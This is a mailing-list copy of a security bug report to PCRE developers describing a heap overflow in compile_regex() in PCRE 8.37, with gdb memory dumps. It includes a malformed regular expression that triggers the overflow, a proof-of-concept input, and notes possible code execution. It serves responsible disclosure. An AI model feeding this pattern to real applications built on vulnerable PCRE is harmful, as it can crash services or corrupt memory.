[pcre-dev] [Bug 1672] New: PCRE Library Heap Overflow in com…

Top Page
Delete this message
Author: admin
Date:  
To: pcre-dev
New-Topics: [pcre-dev] [Bug 1672] PCRE Library Heap Overflow in compile_regex()
Subject: [pcre-dev] [Bug 1672] New: PCRE Library Heap Overflow in compile_regex()
https://bugs.exim.org/show_bug.cgi?id=1672

            Bug ID: 1672
           Summary: PCRE Library Heap Overflow in compile_regex()
           Product: PCRE
           Version: 8.37
          Hardware: All
                OS: All
            Status: NEW
          Severity: security
          Priority: medium
         Component: Code
          Assignee: ph10@???
          Reporter: rubymail@???
                CC: pcre-dev@???


I. Summary
PCRE is a regular expression C library inspired by the regular expression
capabilities in the Perl programming language. The PCRE library is incorporated
into a number of prominent programs, such as Adobe Flash, Apache, Nginx, PHP.
PCRE library is prone to a vulnerability which leads to Heap Overflow. During
the compilation of a malformed regular expression, more data is written on the
malloced block than the expected size output by compile_regex. Exploits with
advanced Heap Fengshui techniques may allow an attacker to execute arbitrary
code in the context of the user running the affected application.
------------------------------------------------------------------
II. Description
Latest version of PCRE is prone to a Heap Overflow vulnerability which could
caused by the following regular expression.

/(?J:(?|(:(?|(?'R')(\z(?|(?'R')(\k'R')|((?'R')))k'R')|((?'R')))H'Ak'Rf)|s(?'R')))/

A dry run of this particular regular expression with pcretest will reports
"double free or corruption (!prev)".
But it is actually a heap overflow problem.
It is a similar problem as https://bugs.exim.org/show_bug.cgi?id=1667
discussed.

Following test is conveyed with svn updated version of pcre,
Here is the memory layout of re(its size is 248) just before the second
compile_regexp():
==============================================================
(gdb) x/256b 0x1f8a8a0
0x1f8a8a0:     [0x45    0x52    0x43    0x50    0xf8    0x00    0x00    0x00
0x1f8a8a8:      0x00    0x00    0x00    0x00    0x00    0x04    0x00    0x00
0x1f8a8b0:      0xff    0xff    0xff    0xff    0xff    0xff    0xff    0xff
0x1f8a8b8:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f8a8c0:      0x00    0x00    0x40    0x00    0x04    0x00    0x05    0x00
0x1f8a8c8:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f8a8d0:      0x50    0xaf    0xf8    0x01    0x00    0x00    0x00    0x00
0x1f8a8d8:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f8a8e0:      0x00    0x02    0x52    0x00    0x00    0x04    0x52    0x00
0x1f8a8e8:      0x00    0x05    0x52    0x00    0x00    0x03    0x52    0x00
0x1f8a8f0:      0x00    0x01    0x52    0x00    0x00    0x00    0x00    0x00
0x1f8a8f8:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f8a900:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f8a908:      0xc0    0x91    0x34    0xf7    0xff    0x7f    0x00    0x00
0x1f8a910:      0xff    0xff    0xff    0xff    0x00    0x00    0x00    0x00
0x1f8a918:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f8a920:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f8a928:      0x80    0xa9    0xf8    0x01    0x00    0x00    0x00    0x00
0x1f8a930:      0xff    0xff    0xff    0xff    0xff    0xff    0xff    0xff
0x1f8a938:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f8a940:      0x90    0xa9    0xf8    0x01    0x00    0x00    0x00    0x00
0x1f8a948:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f8a950:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f8a958:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f8a960:      0xff    0xff    0xff    0xff    0x00    0x00    0x00    0x00
0x1f8a968:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f8a970:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f8a978:      0xa0    0x76    0x34    0xf7    0xff    0x7f    0x00    0x00
0x1f8a980:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f8a988:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f8a990:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00]
0x1f8a998:      0x41    0x01    0x00    0x00    0x00    0x00    0x00    0x00
==============================================================


After the second compile_regexp:

==============================================================
(gdb) x/192b 0x1f8a8a0
0x1f8a8a0:     [0x45    0x52    0x43    0x50    0xf8    0x00    0x00    0x00
0x1f8a8a8:      0x00    0x00    0x00    0x00    0x00    0x04    0x00    0x00
0x1f8a8b0:      0xff    0xff    0xff    0xff    0xff    0xff    0xff    0xff
0x1f8a8b8:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f8a8c0:      0x00    0x00    0x40    0x00    0x04    0x00    0x05    0x00
0x1f8a8c8:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f8a8d0:      0x50    0xaf    0xf8    0x01    0x00    0x00    0x00    0x00
0x1f8a8d8:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f8a8e0:      0x00    0x02    0x52    0x00    0x00    0x04    0x52    0x00
0x1f8a8e8:      0x00    0x05    0x52    0x00    0x00    0x03    0x52    0x00
0x1f8a8f0:      0x00    0x01    0x52    0x00    0x83    0x00    0xa6    0x83
0x1f8a8f8:      0x00    0xa0    0x83    0x00    0x8d    0x81    0x00    0x87
0x1f8a900:      0x85    0x00    0x81    0x00    0x01    0x1d    0x3a    0x83
0x1f8a908:      0x00    0x56    0x85    0x00    0x05    0x00    0x02    0x78
0x1f8a910:      0x00    0x05    0x81    0x00    0x48    0x85    0x00    0x42
0x1f8a918:      0x00    0x03    0x18    0x83    0x00    0x1e    0x85    0x00
0x1f8a920:      0x05    0x00    0x04    0x78    0x00    0x05    0x81    0x00
0x1f8a928:      0x10    0x85    0x00    0x0a    0x00    0x05    0x73    0x00
0x1f8a930:      0x00    0x00    0x05    0x78    0x00    0x0a    0x78    0x00
0x1f8a938:      0x10    0x77    0x00    0x13    0x85    0x00    0x0d    0x00
0x1f8a940:      0x04    0x85    0x00    0x05    0x00    0x05    0x78    0x00
0x1f8a948:      0x05    0x78    0x00    0x0d    0x78    0x00    0x31    0x1d
0x1f8a950:      0x6b    0x1d    0x27    0x1d    0x52    0x1d    0x27    0x78
0x1f8a958:      0x00    0x42    0x78    0x00    0x48    0x77    0x00    0x13
0x1f8a960:      0x85    0x00    0x0d    0x00    0x02    0x85    0x00    0x05
0x1f8a968:      0x00    0x03    0x78    0x00    0x05    0x78    0x00    0x0d
0x1f8a970:      0x78    0x00    0x69    0x1d    0x48    0x1d    0x27    0x1d
0x1f8a978:      0x41    0x1d    0x6b    0x1d    0x27    0x1d    0x52    0x1d
0x1f8a980:      0x66    0x78    0x00    0x81    0x78    0x00    0x87    0x77
0x1f8a988:      0x00    0x0d    0x1d    0x73    0x85    0x00    0x05    0x00
0x1f8a990:      0x01    0x78    0x00    0x05    0x78    0x00    0x9a    0x78]
0x1f8a998:      0x00    0xa0    0x78    0x00    0xa6    0x00    0x00    0x00
==============================================================
At least 5 more bytes are written to the heap.


------------------------------------------------------------------
III. Impact
Heap Overflow
------------------------------------------------------------------
IV. Affected
latest version of PCRE is confirmed to be vulnerable.
PCRE2 is not affected.
Other applications may also be affected.
------------------------------------------------------------------
V. Credit
Wen Guanxing from Venustech ADLAB is credited for this vulnerability.

--
You are receiving this mail because:
You are on the CC list for the bug.